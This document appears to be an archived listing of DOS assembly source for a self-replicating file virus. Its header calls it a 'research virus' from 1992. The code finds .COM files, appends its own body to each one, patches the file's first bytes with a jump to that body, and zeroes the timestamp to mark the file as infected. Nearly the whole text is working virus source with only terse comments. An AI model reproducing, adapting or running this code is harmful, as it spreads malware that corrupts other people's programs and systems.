home *** CD-ROM | disk | FTP | other *** search
- ;***************************************************************************
- ;* *
- ;* 196 - Research Virus Version 1.01 Date. 11th April 1992. *
- ;* *
- ;* Written By : F.Deakin (ACE COMPUTER SYSTEMS) *
- ;* *
- ;* Non-Overwriting Version of 97 Virus *
- ;* *
- ;***************************************************************************
-
- CODE Segment
- Assume CS:CODE
-
- progr equ 100h
-
- org progr
-
- virus_size EQU vir_end-vir_start
- variable_diff EQU variables_start-next_byte
-
- highlander:
- call vir_start ;call virus
- mov ah,4ch ;return to operating system
- int 21h ;thru' dos interrupt 21h
-
- vir_start:
- call next_byte ;call next address
-
- next_byte:
- pop ax ;get virus address
- pop di ;get program start address
- push ax ;save virus address
-
- pop si ;get address of next_byte
- mov ax,variable_diff ;add difference
- add si,ax ;get variables address
-
- mov ax,3 ;move to old address
- sub di,ax ;start of .com file
- add si,ax ;point to old code
- mov ax,[si] ;get two bytes from old code
- mov [di],ax ;and place at start of file
- inc si ;increment to third byte
- inc si ;
- inc di ;increment to third address to save
- inc di ;
- mov al,[si] ;get last byte of old code
- mov [di],al ;and place at start of .COM file
- mov ax,5 ;five bytes out
- sub si,ax ;back to start of variables
-
- mov di,si ;which is copied to destination
- mov ax,6 ;add 6 to variables address
- add di,ax ;and save file control block
-
- ;search for first
- mov ah,4eh ;search for first
- xor cx,cx ;attributes to search
- mov dx,di ;point to fcb
- int 21h ;call dos
- jc return_to_prog ;if no file found return to program
-
- found_one:
- mov ah,2fh ;get DTA address into es:bx
- int 21h ;call dos
- mov ax,22 ;jump over to time
- add bx,ax ;and point to it
- mov al,es:[bx] ;and place in ax
- and al,00000111b ;get seconds only
- cmp al,00h ;zero seconds?
- jnz infect_program ;if not infect program
- mov ah,4fh ;find next file
- int 21h ;call dos
- jmp short found_one ;jump back
-
- infect_program:
- mov ax,8 ;jump to asciiz fcb
- add ax,bx ;add to bx
- mov dx,ax ;and move to dx
- mov ax,3d02h ;open file for writing
- int 21h ;call dos
- jnc continue ;continue if no error
-
- mov ah,4fh ;search for next
- xor cx,cx ;attributes to search
- int 21h ;call dos
- jc return_to_prog ;if no file found return to program
- jmp short found_one ;jump forward if one found
-
- continue:
- mov bx,ax ;transfer file handle to bx
-
- ;read first three bytes
- mov ah,3fh ;read file
- mov cx,3 ;number of bytes to read
- mov dx,3 ;three bytes to old_code
- add dx,si ;point to buffer to read
- int 21h ;call dos
-
- mov ax,4202h ;move file pointer to end of file
- xor cx,cx ;clear cx
- xor dx,dx ;clear dx
- int 21h ;call dos
- dec ax ;decrement ax
- dec ax ;
- dec ax ;
- dec si ;save address
- mov word [si],ax ;and store
-
- mov ah,40h ;write to file
- mov cx,virus_size ;set counter to write
- mov dx,offset vir_start ;point to buffer to start
- int 21h ;and write to file
-
- mov ax,4200h ;move file pointer to start of file
- xor cx,cx ;clear cx
- xor dx,dx ;clear dx
- int 21h ;call dos
-
- mov ah,40h ;write to file
- mov cx,3 ;set counter to write
- inc si ;point to jump address
- mov dx,si ;point to buffer to start
- int 21h ;and write to file
-
- mov ax,5701h ;set date & time
- xor cx,cx ;time set to zero
- xor dx,dx ;and date
- int 21h ;and do it
- mov ah,3eh ;close file
- int 21h ;thru' dos
-
- return_to_prog:
- mov ah,4ch ;terminate program
- int 21h ;exit to dos
-
- variables_start:
- jump_add:
- db 0e8h,0,0
- old_code:
- db 90h,90h,90h
- fcb:
- db "*.COM",0
- variables_end:
-
- vir_end:
-
- CODE ENDS
-
- END highlander
-
- ������������������
